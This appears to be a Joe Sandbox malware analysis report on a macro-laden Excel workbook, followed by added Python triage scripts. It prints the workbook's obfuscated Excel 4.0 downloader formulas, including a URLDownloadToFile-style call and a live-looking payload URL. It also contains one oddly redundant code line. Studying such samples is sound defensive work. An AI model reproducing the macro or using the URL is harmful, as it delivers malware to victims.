Analysis Report request_form_1611565093.xlsm
Overview
General Information
Detection
Score: | 56 (range 0 - 100) |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Malware Configuration: | No configs have been found |
Yara Overview: | No yara matches |
Sigma Overview: | No Sigma rule has matched |
Signature Overview: | see the signature sections below |
Compliance: |
Uses new MSVCR Dlls | Source: File opened |
Software Vulnerabilities: |
Document exploit detected (UrlDownloadToFile) | Sources: Section loaded; File created |
System Summary: |
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Sources: Screenshot OCR (2) |
Found Excel 4.0 Macro with suspicious formulas | Sources: Initial sample (6); Binary string; Classification label; File created (2); File read; Window detected; Key opened; File opened; Process information set (24) |
Mitre Att&ck Matrix (techniques with matched signatures; the number is the count of matching signatures in the report)
Tactic | Technique(s) |
---|---|
Execution | Scripting (11); Exploitation for Client Execution (1) |
Defense Evasion | Masquerading (1); Disable or Modify Tools (1); Scripting (11) |
Discovery | File and Directory Discovery (1); System Information Discovery (1) |
Command and Control | Ingress Tool Transfer (1) |
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample | No Antivirus matches |
Dropped Files | No Antivirus matches |
Unpacked PE Files | No Antivirus matches |
Domains | No Antivirus matches |
URLs | No Antivirus matches |
Domains and IPs | none recorded |
General Information
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 343657 |
Start date: | 25.01.2021 |
Start time: | 10:17:38 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 18s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | request_form_1611565093.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.evad.winXLSM@1/9@0/0 |
Simulations (Behavior and APIs) | No simulations |
Created / dropped Files (all written by C:\Program Files\Microsoft Office\Office14\EXCEL.EXE)

File 1
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |

File 2
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |

File 3
Category: | dropped |
Size (bytes): | 17500 |
Entropy (8bit): | 7.27269933196204 |
Encrypted: | false |
SSDEEP: | 384:SE054yXBP+wrBonCrciUnuiMEcxSAM3H4Dt:STxBP+wrBoKjviMfxDR |
MD5: | 0B0B549418C73651384EE077580EF90A |
SHA1: | 0BE07852D695C0F1077146460C80D12CAC83F4E5 |
SHA-256: | 1E16E04D1FBC61327F71D7A12583E98CE2879A3DC2DAC2E132CC57F130F1C897 |
SHA-512: | CAD54903479ABF6419FD719F735D94FC23C4C81F717DCF52AEC63302F7C0F8E1D317CC9739FA052F3D69438DB9CA0A0694A8596BDD217A5A01D6D1F61A8EC5C6 |
Malicious: | false |
Reputation: | low |

File 4
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.46681782926981 |
Encrypted: | false |
SSDEEP: | 12:85QnLgXg/XAlCPCHaXgzB8IB/H6X+WnicvbzEbDtZ3YilMMEpxRljKT+TdJP9TdU:854/XTwz6IUYewDv3qa+rNru/ |
MD5: | 7CE4093983DDFBAF50630009A8C67F29 |
SHA1: | CE7308163519F07B742ADA51A490CD0046687DFE |
SHA-256: | AE055C4EC644D3C5E55CC0DAB8D78E2361EBD17942B1899FC32B969968F0AE1C |
SHA-512: | 2DD80E1A1D4562B391BB6F8D751D51BB8E7BAB46418BBFC9E72E2CA8DEB15FF42BB980F29623DF96A68AD85A6DA4AD28AF71A6804D3D35C53A0601347B0ABA3B |
Malicious: | false |
Reputation: | low |

File 5
Category: | dropped |
Size (bytes): | 124 |
Entropy (8bit): | 4.730125367343892 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWcAOWwUPHWwUmxWcAOWwUv:djYOWwwHWwMOWw2 |
MD5: | D552494C0C27BC8EF619231D5509D459 |
SHA1: | AD96453E66411ECBE725407F4F7F2A2DEED53400 |
SHA-256: | E6FCE0037E4F61265B828FB4243326B80733A6C4DD9EC9AEE3AB053092A4C450 |
SHA-512: | E62CEE522DE779C88A4B40287CD9F3567B067AC6DB1217145F079B6D1ACEA665174641E911EE8CFF86E512342C087D7D04527E4B9EF97AC314A71DF780D7A8BD |
Malicious: | false |
Reputation: | low |

File 6
Category: | dropped |
Size (bytes): | 2168 |
Entropy (8bit): | 4.510804984760348 |
Encrypted: | false |
SSDEEP: | 24:8I/XTwz6IknYhFRmEec2FDv3qa+dM7dD2I/XTwz6IknYhFRmEec2FDv3qa+dM7dV:8I/XT3IkmmEi0PQh2I/XT3IkmmEi0PQ/ |
MD5: | 85ED2415D98E7D33596129904224E5FE |
SHA1: | DBDFC10D6D7083E6FFAC167CD87C830C79529DED |
SHA-256: | A0E5991EDF024E098349CFC9D0AD0ED812F511491C882EFAC1DAE1643203FCCF |
SHA-512: | 7F3AEEB5B3BF8A6A7E0506C3317D1A66EE977200240F0307163C5AD5DC52BF2C579F24EF6F4201F0A017C27CA05027FB84620847ECA4AE9BE76C5866A135A639 |
Malicious: | false |
Reputation: | low |

File 7
Category: | modified |
Size (bytes): | 17492 |
Entropy (8bit): | 7.2707140624003115 |
Encrypted: | false |
SSDEEP: | 192:SE0uQGI4Ry4tFEBP6pIMVWwPgboTo/6h9RqquS/P2iponE3/UxrpEsN0AMva0xhU:SE054RtIBP+wr8nqtquiMEcxSAM3HBK |
MD5: | B239AE386FC1B8793325FD40C26BD37C |
SHA1: | CEB45CFBB6BD749ACEA058B7BD362723A9A2E8C1 |
SHA-256: | 92F88E52A4EF44D945930EA44B83826CE68CB8C47C78AFBA7B72BA68AE6D18B1 |
SHA-512: | 6B9D3E623B655B98C24680314B7823FB4728221E6F86864DBA2DFCC7A9D19475024D1BD72ABBD9D52C317B93990A8496C064F53E5332310227AD02FD780E589D |
Malicious: | false |
Reputation: | low |

File 8 (same content as File 3: identical size, entropy and hashes)
Category: | dropped |
Size (bytes): | 17500 |
Entropy (8bit): | 7.27269933196204 |
Encrypted: | false |
SSDEEP: | 384:SE054yXBP+wrBonCrciUnuiMEcxSAM3H4Dt:STxBP+wrBoKjviMfxDR |
MD5: | 0B0B549418C73651384EE077580EF90A |
SHA1: | 0BE07852D695C0F1077146460C80D12CAC83F4E5 |
SHA-256: | 1E16E04D1FBC61327F71D7A12583E98CE2879A3DC2DAC2E132CC57F130F1C897 |
SHA-512: | CAD54903479ABF6419FD719F735D94FC23C4C81F717DCF52AEC63302F7C0F8E1D317CC9739FA052F3D69438DB9CA0A0694A8596BDD217A5A01D6D1F61A8EC5C6 |
Malicious: | false |
Reputation: | low |

File 9
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Static File Info
General
File name: | request_form_1611565093.xlsm |
File size: | 17535 |
Entropy (8bit): | 7.272059464538998 |
MD5: | 9c47eef4c66e4587ecddb55cfc3ef1e6 |
SHA1: | da444ad39f513282d1918beceadc0ceb6edc0d3d |
SHA256: | 042b7d9208258a1a64b9a1ab0079e1bb7898a3b787167457951b810e9b126dd1 |
SHA512: | 37d43fadd6bb4274c15f5c4c339b00d961f7fdd1590e1a05e24bc4564118cdedc5bdd349b984fba8402b3801b57b440d7a152ac94e573351c2a2fb2d57877099 |
SSDEEP: | 384:rdUK4U2aGcIrbnqtcwiMEO81+dAM3SbTz:ZUVaGcIrbnyviMR81+yj |
File Content Preview: | PK..........!.................[Content_Types].xml ...(.....................!!.................................................................................................................................................................................. |
The preview starts with a ZIP local file header ("PK") followed by [Content_Types].xml, i.e. an Office Open XML container rather than a legacy OLE2 workbook.
File Icon
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info
General
Document Type: | OpenXML |
Number of OLE Files: | 1 |
OLE File "request_form_1611565093.xlsm"
Indicators
Has Summary Info: |
Application Name: |
Encrypted Document: |
Contains Word Document Stream: |
Contains Workbook/Book Stream: |
Contains PowerPoint Document Stream: |
Contains Visio Document Stream: |
Contains ObjectPool Stream: |
Flash Objects Count: |
Contains VBA Macros: |
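The OLE indicator table above carries no values for an OpenXML container, so this is the container-level check a responder would run on the .xlsm itself. It is an added example, not part of the Joe Sandbox report or its tooling: in OOXML, Excel 4.0 macros are stored as macro sheets under xl/macrosheets/ (separate from VBA in xl/vbaProject.bin), and sheet visibility is recorded in xl/workbook.xml. The workbook built by make_sample_xlsm() is constructed for the demo; it reuses two formulas and the 'Doc2' sheet name from the report, but the sheet named Macro1, the cell positions and the veryHidden state are assumptions, not facts about the analysed file.

```python
"""Container-level triage of an OpenXML workbook for Excel 4.0 (XLM) macros.

Added example, not part of the Joe Sandbox report. In OOXML, XLM macros are
stored as macro sheets under xl/macrosheets/, VBA under xl/vbaProject.bin,
and sheet visibility (visible / hidden / veryHidden) in xl/workbook.xml.
The sample workbook below is constructed: two formulas and the 'Doc2' name
come from the report, everything else (sheet "Macro1", cell positions, the
veryHidden state) is an assumption made for the demo.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def make_sample_xlsm() -> bytes:
    """Minimal .xlsm-shaped ZIP with one macro sheet (constructed; not openable by Excel)."""
    workbook = (f'<workbook xmlns="{NS}" xmlns:r="{NS_REL}"><sheets>'
                '<sheet name="Macro1" sheetId="1" r:id="rId1"/>'
                '<sheet name="Doc2" sheetId="2" state="veryHidden" r:id="rId2"/>'
                "</sheets></workbook>")
    macrosheet = (f'<macrosheet xmlns="{NS}"><sheetData>'
                  '<row r="1"><c r="V1"><f>RUN(V2)</f><v>0</v></c></row>'
                  '<row r="60"><c r="A60" t="str"><v>https://japort.com/suret/victory.php</v></c>'
                  '<c r="V60"><f>CALL("INSENG","DownloadFile","BCCJ",A60,'
                  "'Doc2'!AD15&amp;'Doc2'!AD19&amp;'Doc2'!AD23,1)</f><v>0</v></c></row>"
                  "</sheetData></macrosheet>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/workbook.xml", workbook)
        zf.writestr("xl/macrosheets/sheet1.xml", macrosheet)
        zf.writestr("xl/worksheets/sheet2.xml", f'<worksheet xmlns="{NS}"><sheetData/></worksheet>')
    return buf.getvalue()


def make_clean_xlsx() -> bytes:
    """Same skeleton with a single visible worksheet, for a negative check."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", f'<workbook xmlns="{NS}"><sheets>'
                    '<sheet name="Sheet1" sheetId="1"/></sheets></workbook>')
        zf.writestr("xl/worksheets/sheet1.xml", f'<worksheet xmlns="{NS}"><sheetData/></worksheet>')
    return buf.getvalue()


def triage_xlsm(data: bytes) -> dict:
    """List macro/VBA parts, sheet visibility and every formula on the macro sheets."""
    info = {"macrosheets": [], "vba": False, "sheets": {}, "formulas": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        info["macrosheets"] = sorted(n for n in names
                                     if n.startswith("xl/macrosheets/") and n.endswith(".xml"))
        info["vba"] = "xl/vbaProject.bin" in names
        if "xl/workbook.xml" in names:
            for sheet in ET.fromstring(zf.read("xl/workbook.xml")).iter(f"{{{NS}}}sheet"):
                info["sheets"][sheet.get("name")] = sheet.get("state", "visible")
        for part in info["macrosheets"]:
            for cell in ET.fromstring(zf.read(part)).iter(f"{{{NS}}}c"):
                f = cell.find(f"{{{NS}}}f")
                if f is not None and f.text:  # formulas are stored without the leading '='
                    info["formulas"].append((part, cell.get("r"), "=" + f.text))
    return info


def verdict(info: dict) -> list:
    """Findings worth escalating; a macro sheet alone is reason enough."""
    findings = []
    if info["macrosheets"]:
        findings.append("Excel 4.0 macro sheet(s): " + ", ".join(info["macrosheets"]))
    if info["vba"]:
        findings.append("VBA project present: xl/vbaProject.bin")
    hidden = {n: s for n, s in info["sheets"].items() if s != "visible"}
    if hidden:
        findings.append("non-visible sheets: " + ", ".join(f"{n} ({s})" for n, s in hidden.items()))
    calls = [f for _, _, f in info["formulas"] if f.upper().startswith("=CALL(")]
    if calls:
        findings.append(f"{len(calls)} CALL() formula(s) importing Win32 exports from the sheet")
    return findings


if __name__ == "__main__":
    for label, blob in (("sample", make_sample_xlsm()), ("clean", make_clean_xlsx())):
        print(label, verdict(triage_xlsm(blob)))
```

Pointing triage_xlsm() at the real sample's bytes answers the questions the empty indicator table leaves open (macro sheets present, VBA present, which sheets are hidden) before any dynamic analysis is run; the clean skeleton shows the checker stays silent on a workbook without macro parts.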
Macro 4.0 Code
Populated cells of the macro sheet, in dump order (empty cells omitted, CSV quote doubling undone):
=RUN(V2)
=HALT()
=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,"JCJ",'Doc2'!AD15,0)
=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,"JCJ",'Doc2'!AD15&'Doc2'!AD19,0)
=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,"JJCCJJ",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)
=CALL("INSENG","DownloadFile","BCCJ",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)
=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,"JJCCCCJJ",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)
=RUN(V1)
String cell (the only URL in the dump): https://japort.com/suret/victory.php

Reading the CALL formulas: CALL(dll, export, types, args...) imports a Win32 export directly from the sheet. In the type string the first code is the return type and the remaining codes are the argument types (J = long, C = null-terminated string, B = double). All but one call build the DLL and export names at run time by concatenating cells of the 'Doc2' sheet, so those names are not visible in this dump; the one hard-coded import is INSENG!DownloadFile(A60, path, 1). The "JJCCJJ" call has the shape of URLDownloadToFileA (long return; long, char*, char*, long, long arguments), consistent with the "Document exploit detected (UrlDownloadToFile)" signature above, and its second argument is cell A60, the same cell passed to DownloadFile. The "JJCCCCJJ" type string declares seven arguments but the formula supplies six (one of them empty), which matters when reconstructing the intended call.
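As an added example (not part of the Joe Sandbox report or its tooling), the following script parses a dump in the shape printed above, recovers cell coordinates, decodes each CALL's type string into a C-style prototype, flags DLL and export names that are assembled at run time, checks argument counts against the type string, and extracts URLs. It assumes a 26-column sheet, inferred from the 26-field spacing between consecutive formulas in the dump, so coordinates are relative to the first dumped cell; SAMPLE_CELLS is a constructed grid that places the report's formulas and URL on illustrative rows.

```python
"""Triage of the CSV-flattened Excel 4.0 macro sheet printed in the report.

Added example, not part of the Joe Sandbox report or its tooling. It reads a
dump shaped like the report's (one CSV field per cell, rows run together),
recovers A1 coordinates, decodes CALL() type strings to C-style prototypes,
flags names built at run time, checks argument counts and extracts URLs.
Assumption: 26 columns per row (consecutive formulas in the report's dump sit
26 fields apart), so coordinates are relative to the first dumped cell.
SAMPLE_CELLS is constructed: contents from the report, rows illustrative.
"""
import csv
import io
import re

# Excel CALL/REGISTER type codes (Microsoft XLL SDK); the first code is the return type.
TYPE_CODES = {"A": "BOOL", "B": "double", "C": "char*", "D": "char* (counted)", "E": "double*",
              "F": "char* (in/out)", "G": "char* (counted, in/out)", "H": "unsigned short",
              "I": "short", "J": "long", "K": "FP*", "L": "BOOL*", "M": "short*", "N": "long*",
              "O": "array", "P": "XLOPER*", "R": "XLOPER*"}
WIDTH = 26  # assumed sheet width, see module docstring
URL_RE = re.compile(r"https?://[^\s\"',]+")
RUNTIME = "<built at run time>"

SAMPLE_CELLS = {  # constructed layout; cell contents copied from the report
    "V1": "=RUN(V2)",
    "V2": "=HALT()",
    "V6": "=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,\"JCJ\",'Doc2'!AD15,0)",
    "V7": "=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,\"JCJ\",'Doc2'!AD15&'Doc2'!AD19,0)",
    "V8": "=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,\"JJCCJJ\",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",
    "V9": "=CALL(\"INSENG\",\"DownloadFile\",\"BCCJ\",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",
    "V10": "=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,\"JJCCCCJJ\",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",
    "V11": "=RUN(V1)",
    "A60": "https://japort.com/suret/victory.php",
}


def col_letter(i: int) -> str:  # 0 -> A, 25 -> Z, 26 -> AA
    s = ""
    while True:
        i, r = divmod(i, 26)
        s = chr(65 + r) + s
        if i == 0:
            return s
        i -= 1


def col_index(letters: str) -> int:  # A -> 0, Z -> 25, AA -> 26
    return sum((ord(c) - 64) * 26 ** k for k, c in enumerate(reversed(letters))) - 1


def build_dump(cells: dict, width: int = WIDTH) -> str:
    """Lay a {A1-ref: value} grid out the way the report does: one CSV field per cell."""
    refs = {ref: re.match(r"([A-Z]+)(\d+)", ref).groups() for ref in cells}
    grid = [[""] * width for _ in range(max(int(r) for _, r in refs.values()))]
    for ref, (col, row) in refs.items():
        grid[int(row) - 1][col_index(col)] = cells[ref]
    buf = io.StringIO()
    csv.writer(buf,ineterminator="\n").writerows(grid) if False else csv.writer(buf, lineterminator="\n").writerows(grid)
    return buf.getvalue()


def parse_dump(text: str, width: int = WIDTH) -> dict:
    """Flatten every CSV field (line breaks carry no meaning) and map index -> A1 ref."""
    fields = [f for row in csv.reader(io.StringIO(text)) for f in row]
    return {f"{col_letter(i % width)}{i // width + 1}": v for i, v in enumerate(fields) if v != ""}


def split_args(body: str) -> list:
    """Split on top-level commas, honouring "..." strings and nested parentheses."""
    args, cur, depth, quoted = [], "", 0, False
    for ch in body:
        quoted ^= ch == '"'
        depth += (not quoted) * ((ch == "(") - (ch == ")"))
        if ch == "," and not quoted and depth == 0:
            args.append(cur.strip())
            cur = ""
        else:
            cur += ch
    return args + [cur.strip()]


def parse_call(ref: str, formula: str) -> dict:
    """Decode one =CALL(dll, export, types, args...) formula."""
    dll, func, types, *args = split_args(formula[len("=CALL("):-1])
    literal = lambda s: len(s) >= 2 and s[0] == s[-1] == '"'  # quoted constant vs. cell expression
    ret, *argtypes = [TYPE_CODES.get(c, "?" + c) for c in types.strip('"').rstrip("!#")]
    name = func.strip('"') if literal(func) else RUNTIME
    return {"cell": ref, "dll": dll.strip('"') if literal(dll) else RUNTIME, "func": name,
            "prototype": f"{ret} {name}({', '.join(argtypes)})", "args": args,
            "obfuscated": not (literal(dll) and literal(func)), "arity_ok": len(argtypes) == len(args)}


def triage(text: str, width: int = WIDTH) -> dict:
    """Cells, decoded CALLs, URL cells, RUN() targets and URL cells passed to CALL."""
    cells = parse_dump(text, width)
    calls = [parse_call(r, f) for r, f in cells.items() if f.upper().startswith("=CALL(")]
    urls = {r: m.group(0) for r, v in cells.items() if (m := URL_RE.search(v))}
    return {"cells": cells, "calls": calls, "urls": urls,
            "run_targets": [f[5:-1] for f in cells.values() if f.upper().startswith("=RUN(")],
            "url_args": sorted({a for c in calls for a in c["args"] if a in urls})}


if __name__ == "__main__":
    for c in triage(build_dump(SAMPLE_CELLS))["calls"]:
        flag = "" if c["arity_ok"] else "   <-- argument count != type string"
        print(f"{c['cell']}: {c['dll']}!{c['prototype']}{flag}")
```

Run stand-alone it prints one line per CALL with the decoded prototype, marks the "JJCCCCJJ" call whose argument count disagrees with its type string, and reports A60 as both the URL cell and an argument of two calls. The raw lines from the report can be fed to triage() as they are, because parse_dump() flattens all fields before assigning coordinates.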
Network Behavior
No network behavior found, although the macro sheet above carries a download URL; the run ended on timeout (see Analysis stop reason).
System Behavior
General
Start time: | 10:18:45 |
Start date: | 25/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Imagebase: | 0x13f580000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |